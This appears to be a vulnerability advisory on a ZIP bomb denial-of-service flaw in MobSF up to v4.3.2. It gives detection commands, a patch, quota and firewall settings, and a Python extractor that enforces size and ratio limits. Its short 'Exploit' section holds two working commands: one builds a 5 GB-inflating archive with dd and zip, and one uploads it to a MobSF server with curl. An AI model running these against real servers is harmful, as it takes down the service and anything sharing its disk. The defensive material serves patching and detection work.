How the CVE Works:
MobSF (Mobile Security Framework) versions <= v4.3.2 do not check the uncompressed size of an uploaded ZIP archive before extracting it. A ZIP bomb, a small archive that decompresses into an enormous payload (for example 5GB from a 15MB ZIP), can be uploaded through MobSF's static analysis feature; the server extracts it in full, exhausting disk space and causing a denial of service (DoS). Because the storage is shared, the outage also hits any services co-hosted with MobSF.
DailyCVE Form:
Platform: MobSF
Version: <= v4.3.2
Vulnerability: ZIP Bomb
Severity: Critical
Date: 2024-XX-XX
What Undercode Say:
Exploit:
1. Craft a ZIP bomb:
dd if=/dev/zero bs=1M count=5000 | zip -9 bomb.zip -
2. Upload via MobSF API:
curl -X POST -F "[email protected]" http://mobsf-server/upload
Detection:
- Monitor disk spikes during ZIP extraction:
watch -n 1 df -h
- Log analysis for oversized extractions:
grep "Extracting" /var/log/mobsf.log | awk '{if($5 > 100000000) print "ALERT"}'
Mitigation:
1. Patch MobSF to enforce size checks:
import zipfile

def validate_zip(file):
    # Sum the uncompressed sizes declared in the archive's central directory
    with zipfile.ZipFile(file) as z:
        total_size = sum(f.file_size for f in z.infolist())
        if total_size > 100 * 1024 * 1024:  # 100MB limit
            raise ValueError("ZIP too large")
2. Server-level safeguards:
Set disk quotas for the MobSF service account (soft limit 1G, hard limit 2G). setquota takes the block limits in kilobytes and also requires the inode soft/hard limits (0 = unlimited); the filesystem must be mounted with quotas enabled:
sudo setquota -u mobsf 1048576 2097152 0 0 /
3. Network filtering:
# -m quota matches only while its byte budget remains, so ACCEPT within the quota
# and DROP everything after it; a DROP on the match would do the reverse.
iptables -A INPUT -p tcp --dport 8000 -m quota --quota 500000 -j ACCEPT
iptables -A INPUT -p tcp --dport 8000 -j DROP
(Note that this quota is global, counts all clients together and does not reset by itself, so it is a blunt emergency control rather than a per-upload size limit.)
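Mitigation step 1 relies on the sizes recorded in the archive's central directory, which the uploader controls. The following is an added example, not MobSF's own code, showing a two-layer defence: the declared-size and compression-ratio gate an upload handler can call, plus a streaming extractor that counts the bytes actually decompressed and aborts as soon as the budget is exceeded, whatever the headers claimed. The 100 MB cap, the 100:1 ratio ceiling, the function names and the constructed sample archives are assumptions for illustration.

```python
import io
import os
import tempfile
import zipfile

# Limits are assumptions for this example; a real deployment tunes them.
MAX_UNCOMPRESSED_BYTES = 100 * 1024 * 1024   # 100 MB cap on total decompressed size
MAX_RATIO = 100                              # reject anything that inflates more than 100:1
CHUNK = 64 * 1024


class ZipTooLarge(ValueError):
    """Raised when an archive would exceed the configured decompression budget."""


def validate_zip(fileobj, max_bytes=MAX_UNCOMPRESSED_BYTES, max_ratio=MAX_RATIO):
    """First gate: check the sizes the central directory *claims*.

    Cheap, but the headers are attacker-controlled, so safe_extract() re-checks
    against the bytes actually produced.
    """
    with zipfile.ZipFile(fileobj) as zf:
        infos = zf.infolist()
        total = sum(i.file_size for i in infos)
        compressed = sum(i.compress_size for i in infos)
    if total > max_bytes:
        raise ZipTooLarge(f"declared size {total} B exceeds limit {max_bytes} B")
    if compressed and total / compressed > max_ratio:
        raise ZipTooLarge(f"compression ratio {total / compressed:.0f}:1 exceeds {max_ratio}:1")
    return total


def check_upload(fileobj, max_bytes=MAX_UNCOMPRESSED_BYTES, max_ratio=MAX_RATIO):
    """Wrapper an upload handler can call: returns (accepted, declared_size_or_reason)."""
    try:
        return True, validate_zip(fileobj, max_bytes, max_ratio)
    except (ZipTooLarge, zipfile.BadZipFile) as exc:
        return False, str(exc)


def safe_extract(fileobj, dest, max_bytes=MAX_UNCOMPRESSED_BYTES):
    """Second gate: extract while counting real decompressed bytes.

    Aborts the moment the running total crosses max_bytes, regardless of what
    the headers said. Also refuses entries whose path would escape dest.
    """
    root = os.path.realpath(dest)
    written = 0
    with zipfile.ZipFile(fileobj) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(root, info.filename))
            if target != root and not target.startswith(root + os.sep):
                raise ValueError(f"unsafe path in archive: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                for chunk in iter(lambda: src.read(CHUNK), b""):
                    written += len(chunk)
                    if written > max_bytes:
                        raise ZipTooLarge(
                            f"extraction passed {max_bytes} B while writing {info.filename}")
                    dst.write(chunk)
    return written


def extract_to_tempdir(fileobj, max_bytes=MAX_UNCOMPRESSED_BYTES):
    """Extract into a throwaway directory; on rejection the partial output is discarded."""
    with tempfile.TemporaryDirectory() as workdir:
        try:
            return True, safe_extract(fileobj, workdir, max_bytes)
        except ValueError as exc:          # ZipTooLarge is a ValueError subclass
            return False, str(exc)


def build_sample_zip(size, compressible=True):
    """Constructed test input, not a real upload: one entry of `size` bytes.

    Zeros compress roughly 1000:1 and stand in for a ZIP bomb; random bytes
    barely compress and stand in for a normal binary.
    """
    data = b"\0" * size if compressible else os.urandom(size)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payload.bin", data)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    bomb = build_sample_zip(5 * 1024 * 1024)           # a few KB on disk, 5 MB inflated
    print("bomb  :", check_upload(bomb, max_bytes=1024 * 1024))
    print("benign:", check_upload(build_sample_zip(10_000, compressible=False)))
    print("stream:", extract_to_tempdir(build_sample_zip(51_200), max_bytes=10_000))
```

The declared-size check is the one the page's patch performs; the ratio check and the streaming byte count are what stop an archive whose central directory understates its contents, because the count is taken from the decompressed stream rather than from the headers. The extraction should always target a dedicated directory on a filesystem with its own quota, so that even a rejected upload cannot compete with other services for space.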
Reported By: github.com